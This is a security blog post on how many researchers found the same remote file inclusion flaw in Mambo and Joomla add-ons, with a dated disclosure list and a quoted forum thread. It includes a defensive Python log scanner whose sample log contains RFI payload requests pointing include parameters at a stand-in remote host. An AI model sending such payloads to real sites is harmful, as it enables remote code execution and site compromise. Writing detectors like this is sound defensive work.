Vulnerability Research Food Chain
Posted by jericho
I’ve mentioned the sociology aspect of the hacker, vuln researcher and security companies before, specifically how they interact, how one will influence another and more. The list of fun ideas I have on these topics is great, and maybe some day I’ll find the time to write more on them. In the meantime, this obvious one popped up and focuses on vulnerability researchers, how they find bugs, and how some feed off the work of others. We see this often where ResearcherA will find a vulnerability in one script, disclose the information, and ResearcherB will follow up shortly after with the same type of vulnerability in a different script of the same product.
Recently we’ve seen a rash of remote file inclusion bugs in various add-ons to Mambo and Joomla. These add-ons are typically not written by the same developers nor are they distributed with the base installation of each product. However, they all seem to have one thing in common: “mosConfig_absolute_path” (or sometimes “absolute_path”). The same variable is being exploited in dozens of different add-ons and being found by different people. If we examine the chain of disclosure, can we see patterns in who consistently does follow-up research (low hanging fruit) instead of finding original vulnerabilities? Are there more observations in the way they are disclosed, such as reporting to exploit sites vs Bugtraq or Full Disclosure? Are there misplaced signs of ego that accompany what amounts to trivial vulnerability finds, while others are more modest and take it for what it is? Is it surprising that as people jump on the bandwagon, more and more reports end up being inaccurate and not a real vulnerability?
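The pattern described above (one variable, many different add-ons) is just as visible from the web-server side as from the disclosure lists. The following is an added example, not code from the original post or from the Mambo/Joomla projects: a Python scanner that reads access-log lines, flags requests where “mosConfig_absolute_path” or “absolute_path” carries a remote URL or a PHP stream wrapper, and groups the hits by source address to show the same payload being sprayed across unrelated scripts. The log lines, script paths and IP addresses are constructed sample data, and the parameter list is a starting point a defender would extend as new reports come in.

```python
"""Flag remote-file-inclusion attempts that abuse mosConfig_absolute_path /
absolute_path in web-server access logs (added example; sample data is constructed)."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names the post identifies as the common thread across add-ons.
WATCHED_PARAMS = {"mosConfig_absolute_path", "absolute_path"}

# Combined/common log format; the request target sits inside the quoted request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: two RFI attempts from one source against two different
# add-on scripts, one normal request, and one local (non-remote) value that must
# not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Aug/2006:10:01:02 +0000] "GET /components/com_backup/backup.php?mosConfig_absolute_path=http://198.51.100.7/x.txt HTTP/1.1" 200 512
203.0.113.5 - - [21/Aug/2006:10:01:03 +0000] "GET /modules/mod_cbsms/cbsms.php?absolute_path=ftp://198.51.100.7/x.txt HTTP/1.1" 200 512
192.0.2.10 - - [21/Aug/2006:10:02:00 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8192
192.0.2.11 - - [21/Aug/2006:10:03:00 +0000] "GET /mambots/editors/htmlarea3.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 100
"""


def is_remote_include(value: str) -> bool:
    """True when an include-path value points off the local filesystem:
    an http(s)/ftp(s) URL or a PHP stream wrapper (php://, data:)."""
    v = unquote(value).strip().lower()  # second unquote catches double-encoded values
    return bool(re.match(r"^(https?|ftps?)://", v)) or v.startswith(("php://", "data:"))


def find_rfi_attempts(log_text: str) -> list:
    """Return one record per request whose watched parameter carries a remote value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name in WATCHED_PARAMS and is_remote_include(value):
                hits.append({"ip": m["ip"], "ts": m["ts"], "script": parts.path,
                             "param": name, "value": value})
    return hits


def scripts_per_source(hits: list) -> dict:
    """Group flagged scripts by source IP: one source hitting many different
    scripts with the same variable is the 'food chain' pattern in practice."""
    grouped = {}
    for h in hits:
        grouped.setdefault(h["ip"], set()).add(h["script"])
    return {ip: sorted(scripts) for ip, scripts in grouped.items()}


if __name__ == "__main__":
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {h["script"]} {h["param"]}={h["value"]}')
    print(scripts_per_source(found))
```

The check is deliberately on the value, not on the script path: a signature keyed to a specific add-on would miss the next one in the list, while a signature keyed to the shared variable catches every add-on that trusts it.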
While skimming the list, strike-out text indicates the vulnerability has been disputed or proven false. The names of the researchers who didn’t fully check their find are in bold (and I’m curious if the other disclosures hold up under scrutiny). There is one occurrence of italics that potentially shows this type of “research” being used in the wild.
2006-08-21 bigAPE-Backup for Mambo - mdx
2006-08-20 Display MOSBot Manager for Mambo - O.U.T.L.A.W (Aria-security)
2006-08-20 EstateAgent for Mambo - O.U.T.L.A.W (Aria-security)
2006-08-19 CatalogShop for Mambo - O.U.T.L.A.W (Aria-security)
2006-08-18 Joomla x-shop - Crackers_Child
2006-08-18 Joomla Rssxt - Crackers_Child
2006-08-18 Kochsuite for Joomla - camino (Insecurity Research Team)
2006-08-18 mtg_myhomepage For Mambo - O.U.T.L.A.W (Aria-security)
2006-08-18 mambo-phphop Product Scroller - O.U.T.L.A.W (Aria-security)
2006-08-17 contentpublisher for Mambo - Crackers_Child
2006-08-17 MambelFish for Mambo - mdx
2006-08-17 JIM for Joomla - XORON
2006-08-17 mosListMessenger for Mambo - Crackers_Child
2006-08-17 anjel for Mambo - Crackers_Child
2006-08-16 Coppermine for Mambo - k1tk4t
2006-08-16 Reporter for Mambo - Crackers_Child
2006-08-16 comlm for Mambo - CrackersChild
2006-08-14 MMP for Mambo - mdx
2006-08-14 PeopleBook for Mambo - Matdhule
2006-08-10 Remository for Mambo - camino (Insecurity Research Team)
2006-08-07 JD-Wiki for Joomla - jank0 (hackbsd crew)
2006-07-31 Mambatstaff for Mambo - Dr.Jr7
2006-07-30 UHP for Mambo - Kurdish Security
2006-07-29 artlinks for Mambo - Dr.Jr7
2006-07-29 Colophon for Joomla - Drago84 (Exclusive Security Italian Security)
2006-07-28 Security Images for Joomla - Drago84
2006-07-28 MGM for Mambo - A-S-T TEAM
2006-07-28 Guestbook for Mambo - Matdhule
2006-07-24 PrinceClan Chess for Mambo - Tr_ZiNDaN
2006-07-20 MultiBanners for Mambo - Blue|Spy
2006-07-17 Mambo-SMF Forum - ASIANEAGLE
2006-07-17 VideoDB for Mambo - h4ntu (#batamhacker crew)
2006-07-17 LoudMouth for Mambo - h4ntu (#batamhacker crew)
2006-07-17 PollXT for Joomla - vitux
2006-07-17 Calendar for Mambo - Matdhule
2006-07-17 New Article for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-13 perForms for Joomla - “Vuln founded in a log file: lazy 0day!!! :D”
2006-07-12 Hashcash for Joomla - Ahmad Maulana a.k.a Matdhule
2006-07-12 SiteMap for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-12 HTMLArea3 for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-10 PccookBook for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-07 ExtCalendar for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-03 Galleria for Mambo - sikunYuk
2006-06-26 CBSMS Mambo Module - Kw3[R]Ln (Romanian Security Team)
2006-06-13 Jobline for Mambo - SpC-x
While all of this is not necessarily useful to many, this line of research and observation is fascinating.

http://forum.joomla.org/index.php/topic,79477.0.html
Attention: Official List of Vulnerable 3rd Party Add-ons!!! « on: July 23, 2006, 06:11:29 PM »
This will be the home of an official list of all the 3rd party components with known vulnerabilities. Please keep in mind that this list is a work in progress. If there is a “(?)” mark next to an entry it means that I am not sure about some of the details like which version is vulnerable, etc. If you are familiar with these or are the developer or something of that nature I would appreciate your help in clarifying the information. So please check to make sure that I listed the component name, short name, version and suggested fix accurately. I have also added as many references as I could reasonably find so people can find more information on the reports and possibly problems other users have faced from upgrading or not upgrading.
[..]
Ok, this posting is old, but fact of the matter is this: the builders should really begin to get concerned. I am working on a PoC tool that shows how bad an RFI can really be, and no one seems to be taking it seriously. We are mangling more RFIs than anything else, and yet I just can’t believe no one is doing anything to prevent it. Start listening to Silver Bullet, that’s all I can say.